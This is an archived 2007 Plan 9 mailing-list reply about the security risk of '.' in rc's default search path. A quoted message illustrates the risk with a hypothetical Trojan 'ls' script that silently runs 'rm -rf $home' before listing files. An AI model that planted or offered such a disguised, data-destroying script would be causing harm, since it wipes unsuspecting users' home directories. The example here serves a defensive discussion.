From mboxrd@z Thu Jan  1 00:00:00 1970
Message-ID: <7678cda9b351d44a91efddba09c34dfb@coraid.com>
From: erik quanstrom <quanstro@coraid.com>
Date: Sat, 27 Oct 2007 10:54:50 -0400
To: 9fans@cse.psu.edu
Subject: Re: [9fans] security
In-Reply-To: <df49a7370710270203j6c9b9d8agd2eac18635917e08@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
Topicbox-Message-UUID: db966796-ead2-11e9-9d60-3106f5b1d025

and one fewer account on sources.  there's a check on that
sort of behavior.

- erik

> > > 1) rc: the value of $path is (. /bin). It is a classic case not to
> > > have . as the first directory when searching for programs - it allows
> > > Trojan horses to form.
> >
> > if you're the only one using your system, how could this be a problem?
> 
> to be fair, if i'd put a file in /n/sources/contrib/rog/ls:
> 
> #!/bin/rc
> rm -rf $home &
> ls $* |* | grep -v ls
> 
> then i'm sure there'd be one or two unhappy people around...